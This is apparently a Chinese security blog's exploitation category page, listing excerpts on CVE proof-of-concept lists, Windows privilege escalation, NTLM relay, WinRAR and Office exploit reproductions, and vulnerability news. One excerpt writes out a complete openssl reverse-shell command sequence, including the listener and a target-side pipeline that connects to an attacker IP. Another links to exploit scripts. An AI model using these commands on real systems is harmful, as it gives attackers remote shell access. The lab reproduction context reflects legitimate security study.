漏洞利用
  • CVE PoC的精选列表(二)

    CVE-2016-1710在52.0.2743.82之前的Google Chrome中使用的Blink的WebKit / Source / web / ChromeClientImpl.cpp中的ChromeClientImpl :: createWindow方法不会阻止递延帧创建窗口,这使远程攻击者可以通过以下方式绕过同源策略精心制作的网站。CVE-2016-1711在52.0.2743.82之前的Google Chrome中使用的Blink中的WebKit / Source / core / loader / FrameLoader.cpp不会在对DocumentLoader对象执行分离操作期间禁用帧导航,这使远程攻击者可以通过精心制作的网站。CVE-2016-17799.3之前的Apple iOS中的WebKit和9.1之前的Safari中的WebKit允

    2020-04-04 0 0 0 0
  • CVE PoC的精选列表(一)

    资源资源CVE-2011-2856在14.0.835.163之前的Google Chrome中使用的Google V8允许远程攻击者通过未指定的媒介绕过Same Origin Policy。

    2020-04-04 0 0 0 0
  • 【转】利用openssl反弹shell

    早在medium上看到一个使用openssl反弹shell的技巧,遂试了下,分享给老哥们。环境:kali(192.168.198.200)ubuntu(192.168.198.206)在kali机器上生成自签名证书:openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes在kali机器上启动8888端口监听:openssl s_server -quiet -key key.pem -cert cert.pem -port 8888在目标机器上利用openssl反弹shell:mkfifo /tmp/s; /bin/sh -i /tmp/s 21 | openssl s_client -quiet -connect 192.168.198.200:8888 /tmp/s; rm /tmp/s

    2020-04-02 0 0 0 0
  • 【复现】CVE-2020-0796 本地提权

    该漏洞是由SMBv3处理恶意制作的压缩数据包,远程, 未经认证 攻击者可能利用此漏洞在应用程序的上下文中执行任意代码。目前出现的poc版本是利用CVE-2020-0796 进行本地提权win10系统的 1903、1909版本有效漏洞对应的补丁号为:KB4551762漏洞利用脚本:https://github.com/danigargu/CVE-2020-0796我的github也备份了一份:https://github.com/fr1sh/Somecode/tree/master/CVE-2020-0796新建一个低权限用户,运行会弹出一个system权限的cmd一些实际测试遇到的情况1、如果存在多用户登陆情况,弹出的cmd框,可能在其他用户的界面2、系统已修

    2020-04-02 0 0 0 0
  • 内网渗透-net-NTLM hash的攻击

    0x01 前言记得之前有个知识点还没有去写,虽然比较简单,但是很多文章对突出的重点写的不够详细,所以我搭个环境整理一下,具体一些认证原理、以及中继转发的过程,请查看我的上一篇文章。0x02 中继原理对于SMB协议,客户端在连接服务端时,默认先使用本机的用户名和密码hash尝试登录,所以可以模拟SMB服务器从而截获其它PC的net-ntlm hash。而作为中继的机器必须要有域管理员权限或本地管理员权限,且被中继的机器要关闭smb签名认证,否则怎么去做中继呢,比如本文案例用域控做中继。除了中继smb协议,还可以中继LDAP,从域内内收集更多的

    2020-03-22 0 0 0 0
  • WinRAR漏洞详细复现过程

    把写在公司社区里的文章在简书里再发一遍 :)漏洞描述:2019年2月20日,Check Point团队爆出了一个关于WinRAR存在19年的漏洞, 该漏洞是由于 WinRAR 所使用的一个陈旧的动态链接库UNACEV2.dll所造成的,即在解压一个恶意ACE文件时,解压目录会被设置为Startup文件夹,这个文件夹可在电脑重新启动时自动运行文件夹内的程序,从而造成任意代码执行的效果。漏洞影响版本:WinRAR 5.70 Beta 1Bandizip = 6.2.0.0好压(2345压缩) = 5.9.8.10907360压缩 = 4.0.0.1170PS:目前我在WinRAR上复现成功,但是在Bandzip上失败,看来有些软件的行动

    2020-03-15 0 0 0 0
  • CVE-2017-11882漏洞超详细复现

    CVE-2017-11882漏洞复现的文章我之前在公司社区里已经发过一遍了,但是最近又研究了一点并且和CVE-2018-0802结合了一下

    2020-03-11 0 0 0 0
  • 在线编码平台中的安全风险

    在线编码平台的威胁建模在选择云集成开发环境(IDE)之前,您(即开发人员)通常需要将所需的一切下载和/或安装到自己的工作站上。但是,随着DevOps的发展和云计算使用量的增加,您现在也可以在线进行编码。方便,是的,但是在线IDE安全吗?为了回答这个问题,我们将专注于两个流行的基于云的IDE:AWS Cloud9和Visual Studio Online。在在线编码中,IDE呈现在浏览器内部,浏览器JavaScript引擎使用WebSocket在后台启动与链接设备[例如虚拟专用服务器(VPS)]的SSH(安全外壳)连接,从而为您提供熟悉的终端执行命令的界面。该环境(即链接

    2020-03-08 0 0 0 0
  • CVE-2020-8597:严重的PPP守护程序缺陷影响大多数Linux发行版

    刚刚报告了一个已经存在17年的远程代码执行错误,该错误会影响几乎所有Linux操作系统中的PPP守护程序软件(pppd)。PPP守护程序已安装在各种Linux发行版中,并且还为一系列网络设备的固件供电。RCE漏洞也称为CVE-2020-8597,由IOActive安全研究员Ilja Van Sprundel发现。应该提到的是pppd是点对点协议(PPP)的实现,用于实现节点之间的通信和数据传输。这些节点主要用于建立Internet链接,例如通过拨号调制解调器,DSL宽带连接和虚拟专用网络的链接。有关PPP守护程序(pppd)的更多信息“ PPP是一种可通过拨号调制解调器,DSL连接和许多其

    2020-03-07 0 0 0 0
  • CVE-2020-0674: IE 0 day漏洞

    微软在发布的安全公告(ADV200001)中提到了一个影响IE浏览器的0day 远程代码执行漏洞——CVE-2020-0674,微软确定该 0day漏洞已有在野利用。根据微软发布的安全公告,CVE-2020-0674漏洞是一个远程代码执行漏洞,漏洞存在于IE浏览器中的脚本引擎在内存中处理对象的方式。该漏洞会破坏内存以至于攻击者可以在当前用户环境下执行任意代码。成功利用该漏洞的攻击者可以获取与当前用户相同的用户权限。如果当前用户是以管理员用户权限登陆的,那么攻击者也就获取了管理员用户权限,可以通过利用该漏洞完全控制受影响的系统。攻击者成功利用该漏洞

    2020-01-23 0 0 0 0
技术支持: 建站ABC | 管理登录